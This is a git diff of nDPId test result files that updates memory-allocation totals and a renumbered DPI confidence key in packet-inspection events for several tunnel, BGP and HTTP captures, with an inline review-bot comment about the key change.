00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":41,"source":"443-safari.pcap","alias":"nDPId-test","packets-captured":41,"packets-processed":41,"total-skipped-flows":0,"total-l4-payload-len":17203,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581109360696} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 41/41 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875578 bytes -~~ total memory freed........: 5875578 bytes -~~ total allocations/frees...: 118161/118161 +~~ total memory allocated....: 6009212 bytes +~~ total memory freed........: 6009212 bytes +~~ total allocations/frees...: 120923/120923 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 1148 chars diff --git a/test/results/4in4tunnel.pcap.out b/test/results/4in4tunnel.pcap.out index 626cd3475..887a3a5ff 100644 --- a/test/results/4in4tunnel.pcap.out +++ b/test/results/4in4tunnel.pcap.out @@ -23,9 +23,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 192 chars ~~ json string max len.......: 558 chars 
diff --git a/test/results/4in6tunnel.pcap.out b/test/results/4in6tunnel.pcap.out index fb4640c01..667fb53cd 100644 --- a/test/results/4in6tunnel.pcap.out +++ b/test/results/4in6tunnel.pcap.out 
@@ -2,10 +2,10 @@ 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1543235434019} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"flow_datalink":1,"flow_max_packets":3} 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1543235434019,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":154,"pkt_l4_len":52,"thread_ts_msec":1543235434019,"pkt":"AAECunaOAAAASfSHht1gAAAAADQEPyLgFoXtpzjMWL3z8ao\/Itg0SrqUFSqsNAAAAAAAAAAqRQAANHvwQAB\/BqsfwKgAAQoKCgH7xwG73+E+ggAAAACAAv\/\/fqUAAAIEBYQBAwMIAQEEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"ndpi": {"confidence": {"4":"DPI"},"proto":"IP_in_IP","breed":"Acceptable","category":"Network"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"ndpi": {"confidence": {"6":"DPI"},"proto":"IP_in_IP","breed":"Acceptable","category":"Network"}} 00594{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1543235434019,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":154,"pkt_l4_len":52,"thread_ts_msec":1543235434019,"pkt":"AAECunaOAAAASfSHht1gAAAAADQEPTRKupQVKqw0AAAAAAAAACoi4BaF7ac4zFi98\/GqPyLYRQAANEufQABhBvlwCgoKAcCoAAEBu\/vHAwzKjt\/hPoOAEv\/\/sQUAAAIEBXgBAwMIAQEEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1543235434019,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":366,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":366,"pkt_l4_len":264,"thread_ts_msec":1543235434019,"pkt":"AAECunaOAAAASfSHht1gAAAAAQgEPyLgFoXtpzjMWL3z8ao\/Itg0SrqUFSqsNAAAAAAAAAAqRQABCHv3QAB\/BqpEwKgAAQoKCgH7xwG73+E+gwMMyo9QGAQA0icAABYDAwDbAQAA1wMDW5uXE0\/QFYUpkWO+HpgF5MI5wT9TQj14SroSH1Zl8oggjz8AALXLO9H2rxfCGsjqy7cU6\/NXDrPxEswgEUGVcfAAJsAswCvAMMAvwCTAI8AowCfACsAJwBTAEwCdAJwAPQA8ADUALwAKAQAAaAAAABEADwAADHd3dy5iaW5nLmNvbQAKAAgABgAdABcAGAALAAIBAAANABQAEgQBBQECAQQDBQMCAwICBgEGAwAjAAAAEAAOAAwCaDIIaHR0cC8xLjEAFwAAABgABgAKAwIBAP8BAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":1780,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IP_in_IP","breed":"Acceptable","category":"Network"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"4in6tunnel.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1543235434019,"flow_last_seen":1543235434019,"flow_idle_time":620000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":1780,"flow_avg_l4_payload_len":445,"midstream":0,"thread_ts_msec":1543235434019,"l3_proto":"ip6","src_ip":"22e0:1685:eda7:38cc:58bd:f3f1:aa3f:22d8","dst_ip":"344a:ba94:152a:ac34::2a","l4_proto":4,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IP_in_IP","breed":"Acceptable","category":"Network"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"4in6tunnel.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":1780,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1543235434019} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869559 bytes -~~ total memory freed........: 5869559 bytes -~~ total allocations/frees...: 118118/118118 +~~ total memory allocated....: 6003193 bytes +~~ total memory freed........: 6003193 bytes +~~ total allocations/frees...: 120880/120880 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 879 chars diff --git a/test/results/6in4tunnel.pcap.out b/test/results/6in4tunnel.pcap.out index ef2772842..08d6fc141 100644 
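Review bot: The numeric key under `ndpi.confidence` is not stable across this libnDPI bump: in the `detected` and `idle` events of this hunk `{"4":"DPI"}` becomes `{"6":"DPI"}` while the label is unchanged. A consumer of this event stream that filters or alerts on the numeric key, for example to tell payload-based detections from weaker ones, would presumably stop matching after the update without raising any error. It would help to state the renumbering in the commit message, e.g. `confidence ids renumbered by libnDPI (DPI: 4 -> 6); match on the name, not the id`, and to document the label string as the stable field. The same key change recurs in the BGP_Cisco_hdlc_slarp, BGP_redist and EAQ hunks further down.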
--- a/test/results/6in4tunnel.pcap.out +++ b/test/results/6in4tunnel.pcap.out @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5873126 bytes -~~ total memory freed........: 5873126 bytes -~~ total allocations/frees...: 118241/118241 +~~ total memory allocated....: 6006760 bytes +~~ total memory freed........: 6006760 bytes +~~ total allocations/frees...: 121003/121003 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 657 chars diff --git a/test/results/6in6tunnel.pcap.out b/test/results/6in6tunnel.pcap.out index 9a8c9c8a9..f93f867ad 100644 --- a/test/results/6in6tunnel.pcap.out +++ b/test/results/6in6tunnel.pcap.out @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870561 bytes -~~ total memory freed........: 5870561 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6004195 bytes +~~ total memory freed........: 6004195 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 604 chars diff --git a/test/results/BGP_Cisco_hdlc_slarp.pcap.out b/test/results/BGP_Cisco_hdlc_slarp.pcap.out index e6c8668c5..2c671b7e4 100644 --- a/test/results/BGP_Cisco_hdlc_slarp.pcap.out +++ b/test/results/BGP_Cisco_hdlc_slarp.pcap.out 
@@ -4,8 +4,8 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1445156939131,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939131,"pkt":"DwAIAEXAACz4kkAAAQa2VmQQAQJkEAEBR5QAs7zqddEAAAAAYAJAABMAAAACBAW0"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1445156939145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":48,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":48,"pkt_l4_len":24,"thread_ts_msec":1445156939145,"pkt":"DwAIAEXAACyvfwAAAQY\/amQQAQFkEAECALNHlBlZ03+86nXSYBJAACYWAAACBAW0"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1445156939152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":44,"pkt_l4_len":20,"thread_ts_msec":1445156939152,"pkt":"DwAIAEXAACj4k0AAAQa2WWQQAQJkEAEBR5QAs7zqddIZWdOAUBBAAD3TAAA="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1445156939131,"flow_last_seen":1445156939152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1445156939152,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1445156939131,"flow_last_seen":1445156989230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1445156989230,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1445156939131,"flow_last_seen":1445156939152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1445156939152,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1445156939131,"flow_last_seen":1445156989230,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1445156989230,"l3_proto":"ip4","src_ip":"100.16.1.2","dst_ip":"100.16.1.1","src_port":18324,"dst_port":179,"l4_proto":"tcp","flow_datalink":9,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"BGP_Cisco_hdlc_slarp.pcap","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-payload-len":345,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1445156989230} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/14 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869849 bytes -~~ total memory freed........: 5869849 bytes -~~ total allocations/frees...: 118128/118128 +~~ total memory allocated....: 6003483 bytes +~~ total memory freed........: 6003483 bytes +~~ total allocations/frees...: 120890/120890 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 692 chars 
diff --git a/test/results/BGP_redist.pcap.out b/test/results/BGP_redist.pcap.out index 128b8944b..59924adc0 100644 --- a/test/results/BGP_redist.pcap.out +++ b/test/results/BGP_redist.pcap.out 
@@ -4,8 +4,8 @@ 00503{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"BGP_redist.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":163,"pkt_type":34887,"pkt_l3_offset":4,"pkt_l4_offset":0,"pkt_len":163,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"DwCIRwABLf5FwACbk8xAAP8G2sQCAgICBAQEBACz+C\/VqGxJPJL2UFAYP7QOoQAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/wBzAgAAAFxAAQECQAIAgAQEAAAAVkAFBAAAAGTAECAAAgBkAAAEVwAFAAAAAQIAgAAAAAAAAwCAAawQAgEAAIAOIQABgAwAAAAAAAAAAAICAgIAeAABkQAAAGQAAABkqgAAAA=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3} 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1256636836167,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":159,"pkt_l4_len":135,"thread_ts_msec":1256636836167,"pkt":"DwAIAEXAAJv\/w0AA\/gZtywICAgIFBQUFALPBGWeqNFC\/WbBkUBg\/x6y+AAD\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/AHMCAAAAXEABAQJAAgCABAQAAABWQAUEAAAAZMAQIAACAGQAAARXAAUAAAABAgCAAAAAAAADAIABrBACAQAAgA4hAAGADAAAAAAAAAAAAgICAgB4AAGRAAAAZAAAAGSqAAAA"} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1256636836167,"flow_last_seen":1256636836167,"flow_idle_time":7580000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":1,"thread_ts_msec":1256636836167,"l3_proto":"ip4","src_ip":"2.2.2.2","dst_ip":"5.5.5.5","src_port":179,"dst_port":49433,"l4_proto":"tcp","flow_datalink":104,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"BGP_redist.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":115,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1256636836167} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/1 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869472 bytes -~~ total memory freed........: 5869472 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003106 bytes +~~ total memory freed........: 6003106 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 192 chars ~~ json string max len.......: 679 chars diff --git a/test/results/EAQ.pcap.out b/test/results/EAQ.pcap.out index c4c9ef68c..0356053fe 100644 
--- a/test/results/EAQ.pcap.out +++ b/test/results/EAQ.pcap.out 
@@ -4,12 +4,12 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432820948562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820948562,"pkt":"ABoRAAACABoRAAABCABFAAA8xb9AAEAGRgEKCAABrcJ3MND5AFA4ezYlAAAAAKACOQisdgAAAgQFtAQCCAoABPOaAAAAAAEDAwQ="} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432820948566,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948566,"pkt":"ABoRAAACABoRAAABCABFAAAoAAJAABAGO9OtwncwCggAAQBQ0PnHhMnaOHs2JlAS\/\/+vjAAA"} 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432820948569,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820948569,"pkt":"ABoRAAACABoRAAABCABFAAAoxcBAAEAGRhQKCAABrcJ3MND5AFA4ezYmx4TJ21AQOQh2hQAA"} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948562,"flow_last_seen":1432820948576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1432820948576,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious 
User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com","url":"www.google.com\/","code":0,"content_type":"","user_agent":"test"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820948562,"flow_last_seen":1432820948576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1432820948576,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.google.com","url":"www.google.com\/","code":0,"content_type":"","user_agent":"test"}} 